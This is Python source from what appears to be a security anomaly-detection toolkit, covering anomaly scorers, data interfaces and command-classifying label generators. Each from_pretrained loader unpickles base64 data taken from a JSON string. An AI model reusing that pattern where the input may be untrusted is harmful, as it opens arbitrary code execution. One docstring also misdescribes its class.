183 |             decompose = TruncatedSVD(n_components=4, n_iter=50, random_state=42)
184 |             decompose.fit(data_encoded)
185 |         else:
186 |             decompose = self._model
187 |             decompose.partial_fit(data_encoded)
188 | 
189 |         self._model = decompose
190 | 
191 |         model = {'encoder': self._data_encoder,
192 |                  'SVD': self._model}
193 | 
194 |         out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
195 |         model = {'model': out_model}
196 |         return model
197 | 
198 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
199 | 
200 |         labels = []
201 |         for item in dataset:
202 |             labels.append(item['_labels'])
203 |         data_encoded = self._data_encoder.transform(labels)
204 |         data_decomposed = self._model.transform(data_encoded)
205 |         data_reconstruct = self._model.inverse_transform(data_decomposed)
206 | 
207 |         difference = data_encoded - data_reconstruct
208 |         power = np.sum(difference ** 2, axis=1)
209 |         error = np.sqrt(power)
210 | 
211 |         return error
212 | 
213 |     @staticmethod
214 |     def from_pretrained(pretrained: str) -> AnomalyDetection:
215 |         tmp = json.loads(pretrained)
216 |         pre_model = pickle.loads(base64.b64decode(tmp['model']))
217 |         model = SVDAnomaly()
218 |         model._data_encoder = pre_model['encoder']
219 |         model._model = pre_model['SVD']
220 | 
221 |         return model
222 | 
223 | 
224 | class StatisticalNGramAnomaly(AnomalyDetection):
225 |     """
226 |     Uses an autoencoder to compute anomaly score
227 |     """
228 | 
229 |     def __init__(self):
230 |         super().__init__()
231 |         self._model = None
232 | 
233 |     def build_model(self, dataset: Datasource, incremental=False) -> dict:
234 |         if not incremental:
235 |             model = {
236 |                 '1': {'TOTAL': 0},
237 |                 '2': {'TOTAL': 0},
238 |                 '3': {'TOTAL': 0}
239 |             }
240 |         else:
241 |             model = self._model
242 |         # for clarity, this code is written explicitly
243 |         for item in tqdm.tqdm(dataset, ncols=100, desc="\tbuilding model"):
244 |             tags = item['_labels']
245 |             string_tags = []
246 |             for tag in tags:
247 |                 if isinstance(tag, str):
248 |                     string_tags.append(tag)
249 |             tags = string_tags
250 |             tags = list(sorted(tags))
251 |             # unigrams
252 |             grams = model['1']
253 |             for ii in range(len(tags)):
254 |                 key = '(' + str(tags[ii]) + ')'
255 |                 if key in grams:
256 |                     grams[key]['COUNT'] += 1
257 |                 else:
258 |                     grams[key] = {'COUNT': 1}
259 |                 grams['TOTAL'] += 1
260 | 
261 |             # bigrams
262 |             grams = model['2']
263 | 
264 |             for ii in range(len(tags) - 1):
265 |                 for jj in range(ii + 1, len(tags)):
266 |                     key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ')'
267 |                     if key in grams:
268 |                         grams[key]['COUNT'] += 1
269 |                     else:
270 |                         grams[key] = {'COUNT': 1}
271 |                     grams['TOTAL'] += 1
272 | 
273 |             # trigrams
274 |             grams = model['3']
275 | 
276 |             for ii in range(len(tags) - 2):
277 |                 for jj in range(ii + 1, len(tags) - 1):
278 |                     for kk in range(jj + 1, len(tags)):
279 |                         key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ',' + str(tags[kk]) + ')'
280 |                         if key in grams:
281 |                             grams[key]['COUNT'] += 1
282 |                         else:
283 |                             grams[key] = {'COUNT': 1}
284 |                         grams['TOTAL'] += 1
285 | 
286 |         # convert to probs and log-probs
287 |         for g in ['1', '2', '3']:
288 |             grams = model[g]
289 |             total = grams['TOTAL']
290 |             for key in grams:
291 |                 if key != 'TOTAL':
292 |                     grams[key]['PROB'] = grams[key]['COUNT'] / total
293 |                     grams[key]['NEG_LOG_PROB'] = -np.log(grams[key]['PROB'])
294 |         self._model = model
295 | 
296 |         out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
297 |         model = {'model': out_model}
298 |         return model
299 | 
300 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
301 | 
302 |         def _build_feats(tags):
303 |             feats = []
304 |             string_tags = []
305 |             perp_score = 0
306 |             for tag in tags:
307 |                 if isinstance(tag, str):
308 |                     string_tags.append(tag)
309 |                 else:
310 |                     perp_score += tag
311 |             tags = string_tags
312 |             tags = list(sorted(tags))
313 | 
314 |             for ii in range(len(tags)):
315 |                 feats.append([tags[ii]])
316 |             for ii in range(len(tags) - 1):
317 |                 for jj in range(ii + 1, len(tags)):
318 |                     feats.append([tags[ii], tags[jj]])
319 | 
320 |             for ii in range(len(tags) - 2):
321 |                 for jj in range(ii + 1, len(tags) - 1):
322 |                     for kk in range(jj + 1, len(tags)):
323 |                         feats.append([tags[ii], tags[jj], tags[kk]])
324 |             new_feats = []
325 |             for feat in feats:
326 |                 mid = "(" + ",".join(feat) + ")"
327 |                 new_feats.append(mid)
328 |             return new_feats, perp_score
329 | 
330 |         def _compute_score(ngram2score, tags, handle_unseen=True):
331 |             feats, perp_score = _build_feats(tags)
332 | 
333 |             score = 0
334 |             for feat in feats:
335 |                 found = False
336 |                 if feat in ngram2score['1']:
337 |                     score += ngram2score['1'][feat]['NEG_LOG_PROB']
338 |                     found = True
339 |                 elif feat in ngram2score['2']:
340 |                     score += ngram2score['2'][feat]['NEG_LOG_PROB']
341 |                     found = True
342 |                 elif feat in ngram2score['3']:
343 |                     score += ngram2score['3'][feat]['NEG_LOG_PROB']
344 |                     found = True
345 |                 if not found:
346 |                     if handle_unseen:
347 |                         import math
348 |                         score += -math.log(1e-8)
349 |             return score + perp_score
350 | 
351 |         scores = []
352 |         if verbose:
353 |             pgb = tqdm.tqdm(dataset, ncols=100, desc="\tscoring data")
354 |         else:
355 |             pgb = dataset
356 |         for item in pgb:
357 |             scores.append(_compute_score(self._model, item['_labels']))
358 | 
359 |         return scores
360 | 
361 |     @staticmethod
362 |     def from_pretrained(pretrained: str) -> AnomalyDetection:
363 |         tmp = json.loads(pretrained)
364 |         pre_model = pickle.loads(base64.b64decode(tmp['model']))
365 |         model = StatisticalNGramAnomaly()
366 |         model._model = pre_model
367 | 
368 |         return model
369 | 
370 | 
371 | class SupervisedClassifierAnomaly(AnomalyDetection):
372 |     def __init__(self):
373 |         super().__init__()
374 |         self.BINARY_GROUND_TRUTHS1 = {'clean', 'bad'}
375 |         self.BINARY_GROUND_TRUTHS2 = {0, 1}
376 |         self.BINARY_IND_TO_GROUND_TRUTH1 = ['clean', 'bad']
377 |         self.BINARY_IND_TO_GROUND_TRUTH2 = [0, 1]
378 | 
379 |         self._model = None
380 |         self._encoder = None
381 |         self._is_binary_preds = False
382 |         self._ind_to_ground_truth = None
383 | 
384 |     def build_model(self, dataset: Datasource, ground_truth_column: str, classifier: str, init_args: dict,
385 |                     incremental=False) -> dict:
386 |         labels = []
387 |         ground_truth_values = set()
388 |         for item in dataset:
389 |             labels.append(item['_labels'])
390 |             ground_truth_values.add(item[ground_truth_column])
391 |         if not incremental:
392 |             encoder = MultiLabelBinarizer()
393 |             labels_enc = encoder.fit_transform(labels)
394 |         else:
395 |             encoder = self._encoder
396 |             labels_enc = encoder.transform(labels)
397 | 
398 |         # set binary preds
399 |         if ground_truth_values == self.BINARY_GROUND_TRUTHS1:
400 |             # all grouth truth labels either clean or bad
401 |             self._is_binary_preds = True
402 |             ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH1  # set bad to index 1
403 |         elif ground_truth_values == self.BINARY_GROUND_TRUTHS2:
404 |             # all grouth truth labels either 0 or 1
405 |             self._is_binary_preds = True
406 |             ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH2  # set 1 to index 1
407 |         else:
408 |             # ground truth labels can be anything
409 |             self._is_binary_preds = False
410 |             ind_to_ground_truth = list(ground_truth_values)
411 | 
412 |         # convert ground truth values to indices
413 |         ground_truth_to_ind = dict()
414 |         for i in range(len(ind_to_ground_truth)):
415 |             ground_truth_to_ind[ind_to_ground_truth[i]] = i
416 |         model_ground_truths = []
417 |         for item in dataset:
418 |             gt = item[ground_truth_column]
419 |             model_ground_truths.append(ground_truth_to_ind[gt])
420 | 
421 |         # get the classifier
422 |         if not incremental:
423 |             try:
424 |                 clf_parts = classifier.split('.')
425 |                 assert clf_parts[0] == 'sklearn'
426 |                 sk_pkg = importlib.import_module('{:s}.{:s}'.format(clf_parts[0], clf_parts[1]))
427 |                 clf_class = getattr(sys.modules[sk_pkg.__name__], clf_parts[2])
428 |             except:
429 |                 raise Exception(
430 |                     'expected classifier to be in sklearn package format: sklearn.<package>.<class> (ex. sklearn.linear_model.LogisiticRegression)')
431 |             clf = clf_class(**init_args)  # dict unpacking for init args
432 |             clf.fit(labels_enc, model_ground_truths)
433 |         else:
434 |             clf = self._model
435 |             clf.partial_fit(labels_enc, model_ground_truths)
436 | 
437 |         # return model
438 |         self._encoder = encoder
439 |         self._ind_to_ground_truth = ind_to_ground_truth
440 |         self._model = clf
441 |         model = {
442 |             'encoder': self._encoder,
443 |             'ind_to_ground_truth': ind_to_ground_truth,
444 |             'is_binary_preds': self._is_binary_preds,
445 |             'classifier': self._model
446 |         }
447 |         out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
448 |         model = {'model': out_model}
449 |         return model
450 | 
451 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
452 |         labels = []
453 |         for item in dataset:
454 |             labels.append(item['_labels'])
455 |         labels_enc = self._encoder.transform(labels)
456 | 
457 |         preds = self._model.predict_proba(labels_enc)
458 |         if self._is_binary_preds:
459 |             # return the "bad" prob
460 |             preds = [pred[1] for pred in preds]
461 |         else:
462 |             # return the class with most prob
463 |             preds = [self._ind_to_ground_truth[np.argmax(pred)] for pred in preds]
464 |         return preds
465 | 
466 |     @staticmethod
467 |     def from_pretrained(pretrained: str) -> AnomalyDetection:
468 |         tmp = json.loads(pretrained)
469 |         pre_model = pickle.loads(base64.b64decode(tmp['model']))
470 |         model = SupervisedClassifierAnomaly()
471 |         model._encoder = pre_model['encoder']
472 |         model._ind_to_ground_truth = pre_model['ind_to_ground_truth']
473 |         model._is_binary_preds = pre_model['is_binary_preds']
474 |         model._model = pre_model['classifier']
475 | 
476 |         return model
477 | 
478 | 
479 | if __name__ == "__main__":
480 |     from osas.data.datasources import CSVDataSource
481 | 
482 |     data_source = CSVDataSource('corpus/hubble_test_tags.csv')
483 | 
484 | 
485 |     def coverter(x):
486 |         return ast.literal_eval(x)
487 | 
488 | 
489 |     data_source._data['_labels'] = data_source._data['_labels'].apply(lambda x: coverter(x))
490 | 
491 |     model = StatisticalNGramAnomaly()
492 |     tmp = model.build_model(data_source)
493 |     tmp = json.dumps(tmp)
494 |     model2 = StatisticalNGramAnomaly.from_pretrained(tmp)
495 |     scores = model(data_source)
496 | 
497 |     scores2 = model2(data_source)
498 |     import operator
499 | 
500 |     dd = {}
501 |     from ipdb import set_trace
502 | 
503 |     for ex, score in zip(data_source, scores):
504 |         dd[",".join(ex['_labels'])] = score
505 |     sorted_x = sorted(dd.items(), key=operator.itemgetter(1))
506 | 
507 |     set_trace()
508 | 


--------------------------------------------------------------------------------
/src/osas/core/interfaces.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | from typing import Union, Any
 20 | from abc import abstractmethod
 21 | 
 22 | 
 23 | class DatasourceIterator:
 24 |     def __init__(self, datasource):
 25 |         self._ds = datasource
 26 |         self._index = 0
 27 | 
 28 |     def __next__(self):
 29 |         if self._index < len(self._ds):
 30 |             rez = self._ds[self._index]
 31 |             self._index += 1
 32 |             return rez
 33 |         else:
 34 |             raise StopIteration
 35 | 
 36 | 
 37 | class DataColumn:
 38 |     def __init__(self):
 39 |         pass
 40 | 
 41 |     @abstractmethod
 42 |     def mean(self) -> float:
 43 |         """Computes mean for numerical columns"""
 44 |         pass
 45 | 
 46 |     @abstractmethod
 47 |     def std(self) -> float:
 48 |         """Computes standard deviation for numerical columns"""
 49 |         pass
 50 | 
 51 |     @abstractmethod
 52 |     def min(self) -> any:
 53 |         """Computes minumum value for numerical columns"""
 54 |         pass
 55 | 
 56 |     @abstractmethod
 57 |     def max(self) -> any:
 58 |         """Computes minumum value for numerical columns"""
 59 |         pass
 60 | 
 61 |     @abstractmethod
 62 |     def unique(self) -> list:
 63 |         """Computes unique values for columns"""
 64 |         pass
 65 | 
 66 |     @abstractmethod
 67 |     def value_counts(self) -> dict:
 68 |         """Computes histogram values for columns"""
 69 |         pass
 70 | 
 71 |     @abstractmethod
 72 |     def tolist(self) -> list:
 73 |         """Computes """
 74 |         pass
 75 | 
 76 |     @abstractmethod
 77 |     def apply(self, func) -> int:
 78 |         """
 79 |         Apply lambda function
 80 |         :param func: function to apply
 81 |         :return:
 82 |         """
 83 |         pass
 84 | 
 85 |     @abstractmethod
 86 |     def __len__(self) -> int:
 87 |         """Returns the number of items in the collection"""
 88 |         pass
 89 | 
 90 |     @abstractmethod
 91 |     def __getitem__(self, index: int) -> dict:
 92 |         """Returns an item as a dictionary
 93 |         :param index - the index of the element
 94 |         """
 95 |         pass
 96 | 
 97 |     @abstractmethod
 98 |     def __setitem__(self, index: int, value: Any) -> dict:
 99 |         """Sets the value for an item
100 |         :param index - the index of the element
101 |         """
102 |         pass
103 | 
104 |     def __iter__(self):
105 |         return DatasourceIterator(self)
106 | 
107 | 
108 | class Datasource:
109 |     def __init__(self):
110 |         pass
111 | 
112 |     @abstractmethod
113 |     def __len__(self) -> int:
114 |         """Returns the number of items in the collection"""
115 |         pass
116 | 
117 |     @abstractmethod
118 |     def __getitem__(self, index: int) -> dict:
119 |         """Returns an item as a dictionary
120 |         :param index - the index of the element
121 |         """
122 |         pass
123 | 
124 |     @abstractmethod
125 |     def __setitem__(self, key: str, value: any):
126 |         """
127 |         Create or set a column
128 |         :param key: column name
129 |         :param value: values
130 |         :return:
131 |         """
132 |         pass
133 | 
134 |     def __iter__(self):
135 |         return DatasourceIterator(self)
136 | 
137 |     @abstractmethod
138 |     def apply(self, func, axis: int = 0) -> int:
139 |         """
140 |         Apply lambda function
141 |         :param func: function to apply
142 |         :param axis: 0-column, 1-row; default=0
143 |         :return:
144 |         """
145 |         pass
146 | 
147 |     @abstractmethod
148 |     def save(self, file_handle) -> None:
149 |         """
150 |         Save the data into csv format
151 |         :param file_handle: open file handle for writing
152 |         :return: None
153 |         """
154 | 
155 | 
156 | class LabelGenerator:
157 |     def __init__(self):
158 |         pass
159 | 
160 |     @abstractmethod
161 |     def __call__(self, input_object: dict) -> [str]:
162 |         """
163 |         Generate specific labels for the dataset entry
164 |         :param input_object: an entry in the dataset
165 |         :return: list of labels generated for this input object
166 |         """
167 |         pass
168 | 
169 |     @abstractmethod
170 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
171 |         """
172 |         This model should generate a model on the input
173 |         :param dataset: the dataset used to generate the model
174 |         :param count_column: use this column for clustered data. If not set, event count will be 1
175 |         :return: This should be a json serializable object
176 |         """
177 |         pass
178 | 
179 |     @staticmethod
180 |     def from_pretrained(pretrained: str) -> object:
181 |         """
182 |         :param pretrained: dictionary holding pretrained model
183 |         :return: New instance
184 |         """
185 |         pass
186 | 
187 | 
188 | class AnomalyDetection:
189 |     def __init__(self):
190 |         pass
191 | 
192 |     @abstractmethod
193 |     def build_model(self, dataset: Datasource, incremental: bool = False) -> dict:
194 |         """
195 |         This model should generate a model on the input
196 |         :param dataset: the dataset used to generate the model
197 |         :param incremental: perform incremental update
198 |         :return: This should be a json serializable object
199 |         """
200 |         pass
201 | 
202 |     @abstractmethod
203 |     def __call__(self, dataset: Datasource, verbose=True) -> [float]:
204 |         """
205 |         Scores a dataset with anomaly scores
206 |         :param dataset: the dataset to score
207 |         :return: an anomaly score for each example in the dataset
208 |         """
209 |         pass
210 | 


--------------------------------------------------------------------------------
/src/osas/core/label_generators.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | from cProfile import label
 20 | import sys
 21 | import pandas as pd
 22 | import numpy as np
 23 | import re
 24 | import math
 25 | 
 26 | sys.path.append('')
 27 | import json
 28 | from osas.core.interfaces import LabelGenerator, Datasource
 29 | from osas.core.utils import Tokenizer
 30 | from enum import Enum
 31 | 
 32 | from lol.api import LOLC
 33 | from lol.api import PlatformType
 34 | from obfuscation_detection import ObfuscationDetectionClassifier
 35 | 
 36 | 
 37 | class ObfuscationField(LabelGenerator):
 38 |     """
 39 |     This type of Label generator handles fields that contain Linux/Windows commands. It uses machine learning
 40 |     to predict if a command is obfuscated or not.
 41 |     """
 42 | 
 43 |     def __init__(self, field_name: str = ''):
 44 |         self._model = {
 45 |             'field_name': field_name,
 46 |         }
 47 |         self._classifier = ObfuscationDetectionClassifier()
 48 | 
 49 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
 50 |         return self._model
 51 | 
 52 |     @staticmethod
 53 |     def from_pretrained(pretrained: str) -> object:
 54 |         lg = ObfuscationField()
 55 |         lg._model = json.loads(pretrained)
 56 |         lg._classifier = ObfuscationDetectionClassifier()
 57 |         return lg
 58 | 
 59 |     def __call__(self, object: dict) -> [str]:
 60 |         command = object[self._model['field_name']]
 61 |         classification = int(self._classifier.predict([command])[0])
 62 |         if classification == 1:
 63 |             ret = 'OBFUSCATED'
 64 |         else:
 65 |             ret = 'NOT OBFUSCATED'
 66 |         return [ret]
 67 | 
 68 | 
 69 | class LOLFieldPlatform(Enum):
 70 |     LINUX = PlatformType.LINUX
 71 |     WINDOWS = PlatformType.WINDOWS
 72 | 
 73 | 
 74 | class LOLField(LabelGenerator):
 75 |     """
 76 |     This type of LabelGenerator handles fields that contain Linux/Windows commands. It uses MachineLearning to
 77 |     predict if a command is part of a Living of the Land attack
 78 |     """
 79 | 
 80 |     def __init__(self, field_name: str = '', platform: LOLFieldPlatform = LOLFieldPlatform.LINUX, return_labels=False):
 81 |         """
 82 |         Constructor
 83 |         :param field_name: what field to look for in the data object
 84 |         :param platform: chose what model to use Windows/Linux
 85 |         :param return_labels: return all generated labels or just the status (BAD, GOOD, NEUTRAL)
 86 |         """
 87 |         if platform == 'linux':
 88 |             platform = PlatformType.LINUX
 89 |         elif platform == 'windows':
 90 |             platform = PlatformType.WINDOWS
 91 |         platform_str = str(platform)
 92 |         self._model = {
 93 |             'field_name': field_name,
 94 |             'platform': platform_str,
 95 |             'return_labels': return_labels
 96 |         }
 97 |         self._classifier = LOLC(platform=platform)
 98 | 
 99 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
100 |         return self._model
101 | 
102 |     @staticmethod
103 |     def from_pretrained(pretrained: str) -> object:
104 |         lg = LOLField()
105 |         lg._model = json.loads(pretrained)
106 |         platform = PlatformType.LINUX
107 |         if lg._model['platform'] == 'PlatformType.WINDOWS':
108 |             platform = PlatformType.WINDOWS
109 |         lg._classifier = LOLC(platform=platform)
110 |         return lg
111 | 
112 |     def __call__(self, object: dict):
113 |         command = object[self._model['field_name']]
114 |         status, labels = self._classifier(command)
115 |         ret_labels = [status]
116 |         if self._model['return_labels']:
117 |             for label in labels:
118 |                 ret_labels.append(label)
119 |         return ret_labels
120 | 
121 | 
122 | class NumericField(LabelGenerator):
123 |     """
124 |     This type of LabelGenerator handles numerical fields. It computes the mean and standard deviation and generates
125 |     labels according to the distance between the current value and the mean value
126 |     (value<=sigma NORMAL, sigma<value<=2*sigma BORDERLINE, 2*sigma<value OUTLIER)
127 |     """
128 | 
129 |     def __init__(self,
130 |                  field_name: str = '',
131 |                  group_by: str = None,
132 |                  stdev: bool = True,
133 |                  stdev_borderline_threshold: float = 1,
134 |                  stdev_outlier_threshold: float = 2,
135 |                  spike: str = 'none',
136 |                  spike_inverse: bool = False,
137 |                  spike_borderline_threshold: float = 10,
138 |                  spike_outlier_threshold: float = 20,
139 |                  label_for_normal: bool = True):
140 |         """
141 |         Constructor
142 |         :param field_name: what field to look for in the data object
143 |         """
144 | 
145 |         if spike not in ('none', 'ratio', 'fixed'):
146 |             print("Unknown spike {0} for NumericField. Expected 'none', 'ratio', or 'fixed'")
147 | 
148 |         if not stdev and spike == 'none':
149 |             print("stdev or spike must be activated for NumericField to operate")
150 | 
151 |         self._model = {
152 |             'mean': None,
153 |             'std_dev': None,
154 |             'count': 0,
155 |             'field_name': field_name,
156 |             'group_by': group_by,
157 |             'stdev': stdev,
158 |             'stdev_borderline_threshold': stdev_borderline_threshold,
159 |             'stdev_outlier_threshold': stdev_outlier_threshold,
160 |             'spike': spike,
161 |             'spike_inverse': spike_inverse,
162 |             'spike_borderline_threshold': spike_borderline_threshold,
163 |             'spike_outlier_threshold': spike_outlier_threshold,
164 |             'label_for_normal': label_for_normal
165 |         }
166 | 
167 |     def _get_group_by_value(self, item, group_by):
168 |         if isinstance(group_by, str):
169 |             return str(item[group_by])
170 |         else:
171 |             return "({0})".format(','.join([str(item[k]) for k in group_by]))
172 | 
173 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
174 |         incremental = False
175 |         if self._model['mean'] is not None:
176 |             ex_mean = self._model['mean']
177 |             ex_stdev = self._model['std_dev']
178 |             ex_count = self._model['count']
179 |             incremental = True
180 |         group_by = self._model['group_by']
181 |         if group_by is None:
182 |             mean = 0
183 |             stdev = 0
184 |             count = 0
185 |         else:
186 |             mean = {}
187 |             stdev = {}
188 |             count = {}
189 |         # mean
190 |         for item in dataset:
191 |             cc = 1
192 |             if count_column is not None:
193 |                 cc = int(item[count_column])
194 |             if group_by is None:
195 |                 mean += item[self._model['field_name']] * cc
196 |                 count += cc
197 |             else:
198 |                 key = self._get_group_by_value(item, group_by)
199 |                 if key not in mean:
200 |                     mean[key] = 0
201 |                     stdev[key] = 0
202 |                     count[key] = 0
203 |                 mean[key] += item[self._model['field_name']] * cc
204 |                 count[key] += cc
205 | 
206 |         if group_by is None:
207 |             mean /= count
208 |         else:
209 |             for key in mean:
210 |                 mean[key] /= count[key]
211 |         # stdev
212 |         for item in dataset:
213 |             cc = 1
214 |             if count_column is not None:
215 |                 cc = int(item[count_column])
216 |             if group_by is None:
217 |                 stdev += ((item[self._model['field_name']] - mean) ** 2) * cc
218 |             else:
219 |                 key = self._get_group_by_value(item, group_by)
220 |                 stdev[key] += ((item[self._model['field_name']] - mean[key]) ** 2) * cc
221 | 
222 |         if group_by is None:
223 |             stdev /= count
224 |             stdev = math.sqrt(stdev)
225 |         else:
226 |             for key in stdev:
227 |                 stdev[key] /= count[key]
228 |                 stdev[key] = math.sqrt(stdev[key])
229 | 
230 |         # update if incremental
231 |         if incremental:
232 |             if group_by is None:
233 |                 new_mean = (ex_mean * ex_count + mean * count) / (ex_count + count)
234 |                 new_stdev = (((ex_stdev ** 2) * ex_count) + ((stdev ** 2) * count)) / (ex_count + count)
235 |                 new_count = ex_count + count
236 |             else:
237 |                 new_mean = {}
238 |                 new_stdev = {}
239 |                 new_count = {}
240 |                 for key in mean:
241 |                     if key in ex_mean:
242 |                         new_mean[key] = (ex_mean[key] * ex_count[key] + mean[key] * count[key]) / (
243 |                                 ex_count[key] + count[key])
244 |                         new_stdev[key] = (((ex_stdev[key] ** 2) * ex_count[key]) + ((stdev[key] ** 2) * count[key])) / (
245 |                                 ex_count[key] + count[key])
246 |                         new_count[key] = ex_count[key] + count[key]
247 |                     else:
248 |                         new_mean[key] = mean[key]
249 |                         new_stdev[key] = stdev[key]
250 |                         new_count[key] = count[key]
251 |                 # transfer ex-values
252 |                 for key in ex_mean:
253 |                     if key not in mean:
254 |                         new_mean[key] = ex_mean[key]
255 |                         new_stdev[key] = ex_stdev[key]
256 |                         new_count[key] = ex_count[key]
257 | 
258 |             mean = new_mean
259 |             stdev = new_stdev
260 |             count = new_count
261 |         # store
262 |         self._model['mean'] = mean
263 |         self._model['std_dev'] = stdev
264 |         self._model['count'] = count
265 |         # check sanity and warn user
266 |         font_style = '\033[93m'
267 |         mean_is_zero = False
268 |         stdev_is_zero = False
269 |         if self._model['group_by'] is None:
270 |             if self._model['mean'] == 0:
271 |                 mean_is_zero = True
272 |             if self._model['std_dev'] == 0:
273 |                 stdev_is_zero = True
274 |         else:
275 |             for key in self._model['mean']:
276 |                 if self._model['mean'][key] == 0:
277 |                     mean_is_zero = True
278 |                 if self._model['std_dev'][key] == 0:
279 |                     stdev_is_zero = True
280 |         if mean_is_zero and self._model['stdev'] == False:
281 |             sys.stdout.write('\t{0}::WARNING:You have a mean of 0. Any deviation will be flagged\n'.format(font_style))
282 |         if stdev_is_zero and self._model['stdev'] == True:
283 |             sys.stdout.write(
284 |                 '\t{0}::WARNING:You have a standard deviation of 0. Any deviation will be flagged\n'.format(font_style))
285 | 
286 |         return self._model
287 | 
288 |     # def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
289 |     #     from osas.data.datasources import CSVDataColumn
290 |     #     incremental = False
291 |     #     if self._model['mean'] is not None:
292 |     #         ex_mean = self._model['mean']
293 |     #         ex_stdev = self._model['std_dev']
294 |     #         ex_count = self._model['count']
295 |     #         incremental = True
296 |     #     if count_column is None:
297 |     #         mean = CSVDataColumn(dataset[self._model['field_name']]).mean()
298 |     #         stdev = CSVDataColumn(dataset[self._model['field_name']]).std()
299 |     #         count = len(dataset[self._model['field_name']])
300 |     #         self._model['mean'] = mean
301 |     #         self._model['std_dev'] = stdev
302 |     #         self._model['count'] = count
303 |     #     else:
304 |     #         mean = CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]).sum()
305 |     #         stdev = ((CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]) - mean) ** 2).sum()
306 |     #         count = dataset[count_column].sum()
307 |     #         mean = mean / count
308 |     #         stdev = math.sqrt(stdev / count)
309 |     #
310 |     #         self._model['mean'] = mean
311 |     #         self._model['std_dev'] = stdev
312 |     #         self._model['count'] = count
313 |     #
314 |     #     if incremental:
315 |     #         new_count = ex_count + count
316 |     #         new_mean = (mean * count + ex_mean * ex_count) / new_count
317 |     #         new_stdev = math.sqrt(((ex_stdev ** 2) * ex_count + (stdev ** 2) * count) / new_count)
318 |     #         self._model['mean'] = new_mean
319 |     #         self._model['std_dev'] = new_stdev
320 |     #         self._model['count'] = new_count
321 |     #
322 |     #     return self._model
323 | 
324 |     def _get_labels(self, cur_value, mean_val, std_val, stdev, stdev_borderline_threshold,
325 |                     stdev_outlier_threshold, spike, spike_inverse, spike_borderline_threshold,
326 |                     spike_outlier_threshold, label_for_normal):
327 |         labels = []
328 |         if stdev:
329 |             if std_val == 0:
330 |                 std_val = 0.01
331 |             stdev_ratio = abs(cur_value - mean_val) / std_val
332 | 
333 |         # if using both stdev and spike, calculate a spike from the stdev
334 |         if stdev and spike != 'none':
335 |             if not spike_inverse:
336 |                 mean_val = mean_val + std_val
337 |             else:
338 |                 mean_val = mean_val - std_val
339 | 
340 |         if spike == 'ratio':
341 |             if not spike_inverse:
342 |                 if mean_val == 0:
343 |                     mean_val = 0.01
344 |                 spike_ratio = cur_value / mean_val
345 |             else:
346 |                 if cur_value == 0:
347 |                     cur_value = 0.01
348 |                 spike_ratio = mean_val / cur_value
349 |         elif spike == 'fixed':
350 |             if not spike_inverse:
351 |                 spike_ratio = cur_value - mean_val
352 |             else:
353 |                 spike_ratio = mean_val - cur_value
354 | 
355 |         field_name = self._model['field_name'].upper()
356 | 
357 |         if stdev and spike != 'none' and stdev_ratio < stdev_outlier_threshold:
358 |             # if both are activated, and event is within stdev outlier threshold
359 |             if label_for_normal:
360 |                 labels.append('{0}_NORMAL'.format(field_name))
361 |         else:
362 |             if stdev and spike == 'none':
363 |                 # only stdev is activated
364 |                 ratio = stdev_ratio
365 |                 borderline_threshold = stdev_borderline_threshold
366 |                 outlier_threshold = stdev_outlier_threshold
367 |             else:
368 |                 # if only spike is activated or both are activated, use spike ratio
369 |                 ratio = spike_ratio
370 |                 borderline_threshold = spike_borderline_threshold
371 |                 outlier_threshold = spike_outlier_threshold
372 | 
373 |             if label_for_normal and ratio < borderline_threshold:
374 |                 labels.append('{0}_NORMAL'.format(field_name))
375 |             elif borderline_threshold < ratio < outlier_threshold:
376 |                 labels.append('{0}_BORDERLINE'.format(field_name))
377 |             elif ratio >= outlier_threshold:
378 |                 labels.append('{0}_OUTLIER'.format(field_name))
379 | 
380 |         return labels
381 | 
382 |     def __call__(self, input_object: dict) -> [str]:
383 |         labels = []
384 |         mean_val = self._model['mean']
385 |         std_val = self._model['std_dev']
386 |         count_val = self._model['count']
387 |         field_name = self._model['field_name'].upper()
388 |         label_for_normal = True
389 |         if 'label_for_normal' in self._model:
390 |             label_for_normal = self._model['label_for_normal']
391 | 
392 |         stdev = True
393 |         if 'stdev' in self._model:
394 |            stdev = bool(self._model['stdev'])
395 | 
396 |         stdev_borderline_threshold = 1
397 |         if 'stdev_borderline_threshold' in self._model:
398 |             stdev_borderline_threshold = self._model['stdev_borderline_threshold']
399 | 
